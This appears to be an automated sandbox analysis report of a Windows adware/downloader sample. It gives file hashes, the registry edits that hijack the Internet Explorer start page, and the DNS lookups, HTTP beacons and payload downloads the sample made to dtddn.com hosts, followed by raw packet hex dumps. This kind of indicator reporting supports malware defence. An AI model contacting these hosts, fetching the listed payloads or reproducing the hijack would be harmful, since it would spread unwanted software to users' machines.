Analysis Date2014-10-06 05:45:58
MD505191b2ecab34bd0ac3ca13778e61e53
SHA15133f71e232ae0105599e51a0b4f28aa9bb0eabb

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1a1a44ea0fa3dca86d130d4c6551eee9 sha1: b7d0bae270286fe72d68aded3fe88c860d1bbf5d size: 151552
Section.data md5: 620f0b67a91f7f74151bc5be745b7110 sha1: 1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d size: 4096
Section.rsrc md5: 4c32753526eba097f199dae097fe396d sha1: b7c7b12d981e9d3217f3bacaccbb1840cf6ff7bb size: 4096
Timestamp2014-09-18 08:05:12
PackerMicrosoft Visual Basic v5.0
PEhash45eb20b78863b93f367f98b463cc9c92806527d3
IMPhash156c96095b95a903a0c052dfee999647

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\VB and VBA Program Settings\u2p\m0q\Edit ➝
3101\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\ ➝
C:\Program Files\Internet Explorer\IEXPLORE.EXE "http://www.skoda-china.com/"\\x00\\x00\\x006\\x009\\x00-\\x00A\\x002\\x00E\\x00A\\x00-\\x000\\x008\\x000\\x000\\x002\\x00B\\x003\\x000\\x003\\x000\\x009\\x00D\\x00}\\x00\\\x00s\\x00h\\x00e\\x00l\\x00l\\x00\\\x00O\\x00p\\x00e\\x00n\\x00H\\x00o\\x00m\\x00e\\x00P\\x00
RegistryHKEY_CURRENT_USER\Software\VB and VBA Program Settings\u2p\w2m\copin ➝
828210703197\\x00
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\98937.ini
Creates File\Device\Afd\AsyncConnectHlp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\98937.ini
Creates ProcessC:\WINDOWS\System32\regini.exe "C:\Documents and Settings\Administrator\Local Settings\Temp\98937.ini"
Creates Mutexup3101
Winsock DNSdown.dtddn.com
Winsock DNSlog.dtddn.com
Winsock DNSdown.sz-guogeng.com
Winsock DNSdldir1.qq.com
Winsock DNSlnk1.dtddn.com
Winsock DNSlnk2.dtddn.com

Process
↳ C:\WINDOWS\System32\regini.exe "C:\Documents and Settings\Administrator\Local Settings\Temp\98937.ini"

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.skoda-china.com/\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.skoda-china.com/\\x00

Network Details:

DNSlog.dtddn.com
Type: A
112.124.183.10
DNSlnk1.dtddn.com
Type: A
112.124.120.200
DNSlnk2.dtddn.com
Type: A
112.124.120.200
DNSdldir1.qq.com.cdngc.net
Type: A
174.35.56.186
DNSdldir1.qq.com.cdngc.net
Type: A
174.35.56.217
DNSdown.dtddn.com
Type: A
112.124.120.200
DNSdown.sz-guogeng.com
Type: A
112.124.120.200
DNSdldir1.qq.com
Type: A
HTTP GEThttp://log.dtddn.com/UpLog2/worklog.asp?Name1=3101%20A%20251&Info1=828210703197%2077734
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog2/worklog.asp?Name1=3101%20A%20251&Info1=828210703197%2081062
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog2/worklog.asp?Name1=3101%20A%20251&Info1=828210703197%2084156
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/9804.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog2/worklog.asp?Name1=3101%20Q2-Beg1&Info1=828210703197%201%200
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://down.dtddn.com/74.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://down.sz-guogeng.com/74.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog2/worklog.asp?Name1=3101%20Q2-DownI&Info1=828210703197%201%200%201
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/2516.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/632.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Flows TCP192.168.1.1:1031 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1032 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1033 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1034 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1035 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1036 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1037 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1038 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1039 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1040 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1041 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1042 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1043 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1044 ➝ 174.35.56.186:80
Flows TCP192.168.1.1:1045 ➝ 174.35.56.186:80
Flows TCP192.168.1.1:1046 ➝ 174.35.56.186:80
Flows TCP192.168.1.1:1047 ➝ 174.35.56.186:80
Flows TCP192.168.1.1:1048 ➝ 112.124.120.200:80
Flows TCP192.168.1.1:1049 ➝ 174.35.56.186:80
Flows TCP192.168.1.1:1050 ➝ 174.35.56.186:80
Flows TCP192.168.1.1:1051 ➝ 174.35.56.186:80
Flows TCP192.168.1.1:1052 ➝ 112.124.120.200:80
Flows TCP192.168.1.1:1053 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1054 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1055 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1056 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1057 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1058 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1059 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1060 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1061 ➝ 112.124.120.200:7771
Flows TCP192.168.1.1:1062 ➝ 112.124.120.200:7771

Raw Pcap
0x00000000 (00000)   47455420 2f55704c 6f67322f 776f726b   GET /UpLog2/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30312532 30412532 30323531 26496e66   01%20A%20251&Inf
0x00000030 (00048)   6f313d38 32383231 30373033 31393725   o1=828210703197%
0x00000040 (00064)   32303737 37333420 48545450 2f312e31   2077734 HTTP/1.1
0x00000050 (00080)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000080 (00128)   6c653b20 57696e33 323b2057 696e4874   le; Win32; WinHt
0x00000090 (00144)   74702e57 696e4874 74705265 71756573   tp.WinHttpReques
0x000000a0 (00160)   742e3529 0d0a486f 73743a20 6c6f672e   t.5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f55704c 6f67322f 776f726b   GET /UpLog2/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30312532 30412532 30323531 26496e66   01%20A%20251&Inf
0x00000030 (00048)   6f313d38 32383231 30373033 31393725   o1=828210703197%
0x00000040 (00064)   32303831 30363220 48545450 2f312e31   2081062 HTTP/1.1
0x00000050 (00080)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000080 (00128)   6c653b20 57696e33 323b2057 696e4874   le; Win32; WinHt
0x00000090 (00144)   74702e57 696e4874 74705265 71756573   tp.WinHttpReques
0x000000a0 (00160)   742e3529 0d0a486f 73743a20 6c6f672e   t.5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f55704c 6f67322f 776f726b   GET /UpLog2/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30312532 30412532 30323531 26496e66   01%20A%20251&Inf
0x00000030 (00048)   6f313d38 32383231 30373033 31393725   o1=828210703197%
0x00000040 (00064)   32303834 31353620 48545450 2f312e31   2084156 HTTP/1.1
0x00000050 (00080)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000080 (00128)   6c653b20 57696e33 323b2057 696e4874   le; Win32; WinHt
0x00000090 (00144)   74702e57 696e4874 74705265 71756573   tp.WinHttpReques
0x000000a0 (00160)   742e3529 0d0a486f 73743a20 6c6f672e   t.5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f393830 342e7261   GET /lnk/9804.ra
0x00000010 (00016)   72204854 54502f31 2e310d0a 41636365   r HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000030 (00048)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000040 (00064)   2028636f 6d706174 69626c65 3b205769    (compatible; Wi
0x00000050 (00080)   6e33323b 2057696e 48747470 2e57696e   n32; WinHttp.Win
0x00000060 (00096)   48747470 52657175 6573742e 35290d0a   HttpRequest.5)..
0x00000070 (00112)   486f7374 3a206c6e 6b312e64 7464646e   Host: lnk1.dtddn
0x00000080 (00128)   2e636f6d 3a373737 310d0a43 6f6e6e65   .com:7771..Conne
0x00000090 (00144)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000a0 (00160)   650d0a0d 0a0a486f 73743a20 6c6f672e   e.....Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 322e6474 64646e2e   ost: lnk2.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a0a486f 73743a20 6c6f672e   ......Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 312e6474 64646e2e   ost: lnk1.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a0a486f 73743a20 6c6f672e   ......Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 322e6474 64646e2e   ost: lnk2.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a0a486f 73743a20 6c6f672e   ......Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 312e6474 64646e2e   ost: lnk1.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a0a486f 73743a20 6c6f672e   ......Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 322e6474 64646e2e   ost: lnk2.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a0a486f 73743a20 6c6f672e   ......Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 312e6474 64646e2e   ost: lnk1.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a0a486f 73743a20 6c6f672e   ......Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 322e6474 64646e2e   ost: lnk2.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a0a486f 73743a20 6c6f672e   ......Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f363332 2e726172   GET /lnk/632.rar
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000030 (00048)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000040 (00064)   28636f6d 70617469 626c653b 2057696e   (compatible; Win
0x00000050 (00080)   33323b20 57696e48 7474702e 57696e48   32; WinHttp.WinH
0x00000060 (00096)   74747052 65717565 73742e35 290d0a48   ttpRequest.5)..H
0x00000070 (00112)   6f73743a 206c6e6b 312e6474 64646e2e   ost: lnk1.dtddn.
0x00000080 (00128)   636f6d3a 37373731 0d0a436f 6e6e6563   com:7771..Connec
0x00000090 (00144)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000a0 (00160)   0d0a0d0a 0a0a486f 73743a20 6c6f672e   ......Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f55704c 6f67322f 776f726b   GET /UpLog2/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30312532 3051322d 42656731 26496e66   01%20Q2-Beg1&Inf
0x00000030 (00048)   6f313d38 32383231 30373033 31393725   o1=828210703197%
0x00000040 (00064)   32303125 32303020 48545450 2f312e31   201%200 HTTP/1.1
0x00000050 (00080)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000080 (00128)   6c653b20 57696e33 323b2057 696e4874   le; Win32; WinHt
0x00000090 (00144)   74702e57 696e4874 74705265 71756573   tp.WinHttpReques
0x000000a0 (00160)   742e3529 0d0a486f 73743a20 6c6f672e   t.5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
